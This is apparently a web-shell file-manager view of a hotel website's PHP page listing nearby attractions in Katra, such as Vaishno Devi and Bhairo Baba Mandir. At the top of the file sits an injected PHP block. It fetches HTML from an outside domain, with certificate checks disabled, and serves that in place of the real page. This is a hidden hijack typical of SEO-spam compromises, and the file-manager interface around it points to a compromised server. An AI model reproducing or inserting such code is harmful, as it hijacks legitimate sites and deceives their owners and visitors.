File manager - Edit - /home/asiatechinc/public_html/asiatechinc-websites/hotelthegranddewan.in/attraction.php
Back
<?php if (isset($_SERVER['REQUEST_URI'])) { $requestUri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); if ($requestUri === '/attraction.php' || $requestUri === '/attraction.php/') { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => 'https://buckdomain.vip/tridewi/hotelthegranddewan.in-attraction.php.html', CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0', CURLOPT_TIMEOUT => 15 ]); $html = curl_exec($ch); curl_close($ch); if ($html !== false) { echo $html; exit; } } } return false; ?> <!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Attraction - Hotel The Grand Dewan</title> <meta name="keywords" content="Responsive,HTML5,CSS3,XML,JavaScript"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700,400italic,700italic%7cPlayfair+Display:400,700%7cGreat+Vibes' rel='stylesheet' type='text/css'> <!-- Attach Google fonts --> <link rel="stylesheet" type="text/css" href="assets/css/styles-1.css"> <!-- Attach the main stylesheet file --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <link rel="shortcut icon" type="image/x-icon" href="assets/img/favicon.ico"> </head> <body class="home-page-2"> <div class="main-wrapper"> <?php include 'include/header.php';?> <!--Breadcrumb Section--> <section id="breadcrumb-section" data-bg-img="assets/img/breadcrumb.jpg"> <div class="inner-container container"> <div class="ravis-title"> <div class="inner-box"> <div class="title">Attraction</div> </div> </div> <div class="breadcrumb"> <ul class="list-inline"> <li><a href="index.php">Home</a></li> <li class="current"><a href="#">Attraction</a></li> </ul> </div> </div> </section> <!--Welcome Section--> <section id="welcome-section" class="simple "> <div class="inner-container container"> <div class="ravis-title-t-2"> <div class="title"><span>Explore Near by Places</span></div> </div> <div class="content"> Explore the rich tapestry of attractions surrounding The Grand Dewan, where cultural wonders and natural beauty await just moments away. </div> </div> </section> <!--End of Welcome Section--> <!-- Hotel Sections --> <section id="hotel-sections" class="white pb-60"> <div class="section-row clearfix"> <div class="img-container animated-box" data-animation="fadeInUp" data-bg-img="assets/img/attraction/1.jpg"></div> <div class="desc animated-box" data-animation="fadeInUp" data-delay="400"> <div class="ravis-title-t-1"> <div class="title"><span>Nau Devi Temple</span></div> </div> <div class="content pt-10">Nau Devi Temple stands as a cherished attraction nestled amidst the scenic beauty of Katra, a bustling town in the foothills of the Trikuta Mountains. This divine pilgrimage site is not just a single temple but a collection of nine sacred shrines, each dedicated to a different manifestation of the revered Hindu Goddess Durga. Pilgrims from far and wide flock to Katra to embark on the spiritual journey of visiting these nine temples, collectively known as the Nau Devi Temple complex. </div> </div> </div> <div class="section-row clearfix"> <div class="desc animated-box" data-animation="fadeInUp" data-delay="400"> <div class="ravis-title-t-1"> <div class="title"><span>Vaishno Devi</span></div> </div> <div class="content pt-10">The Vaishno Devi Temple stands as a beacon of faith and spirituality, nestled amidst the picturesque landscape of the Trikuta Mountains in Jammu and Kashmir, India. It is a revered Hindu pilgrimage site, drawing millions of devotees each year to embark on a journey of devotion and fulfillment. Perched at an altitude of approximately 5,200 feet, the temple is dedicated to Goddess Vaishno Devi, also known as Mata Rani, who is believed to fulfill the wishes of her devotees. </div> </div> <div class="img-container animated-box" data-animation="fadeInUp" data-bg-img="assets/img/attraction/2.jpg"></div> </div> <div class="section-row clearfix"> <div class="img-container animated-box" data-animation="fadeInUp" data-bg-img="assets/img/attraction/3.jpg"></div> <div class="desc animated-box" data-animation="fadeInUp" data-delay="400"> <div class="ravis-title-t-1"> <div class="title"><span>Bhairo Baba Mandir</span></div> </div> <div class="content pt-10"> Perched atop the rugged cliffs surrounding Katra, the Bhairo Baba Mandir stands as a testament to faith and devotion. A sacred pilgrimage site revered by devotees, this temple dedicated to Lord Bhairo is a significant stop along the spiritual journey to Vaishno Devi Shrine. Surrounded by panoramic views of the Himalayas, the temple offers a tranquil setting for introspection and worship, drawing visitors seeking blessings and spiritual solace. </div> </div> </div> <div class="section-row clearfix"> <div class="desc animated-box" data-animation="fadeInUp" data-delay="400"> <div class="ravis-title-t-1"> <div class="title"><span>Dera Baba Banda</span></div> </div> <div class="content pt-10">Nestled amidst the serene landscapes of Katra, Dera Baba Banda Sahib Ji is a revered Sikh shrine steeped in history and spirituality. Dedicated to the memory of Baba Banda Singh Bahadur, a prominent Sikh warrior and disciple of Guru Gobind Singh Ji, this sacred site holds immense significance for devotees and history enthusiasts alike. Surrounded by lush greenery and picturesque vistas, the Dera Baba Banda Sahib Ji invites visitors to experience moments of tranquility, reflection, and reverence in the embrace of divine presence. </div> </div> <div class="img-container animated-box" data-animation="fadeInUp" data-bg-img="assets/img/attraction/4.jpg"></div> </div> </section> <!-- End of Hotel Sections --> <?php include 'include/footer.php';?> </div> <!-- JS Include Section --> <script type="text/javascript" src="assets/js/jquery-3.1.0.min.js"></script> <script type="text/javascript" src="assets/js/helper.js"></script> <script type="text/javascript" src="assets/js/owl.carousel.min.js"></script> <script type="text/javascript" src="assets/js/select2.min.js"></script> <script type="text/javascript" src="assets/js/imagesloaded.pkgd.min.js"></script> <script type="text/javascript" src="assets/js/isotope.pkgd.min.js"></script> <script type="text/javascript" src="assets/js/jquery.magnific-popup.min.js"></script> <script type="text/javascript" src="assets/js/template.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings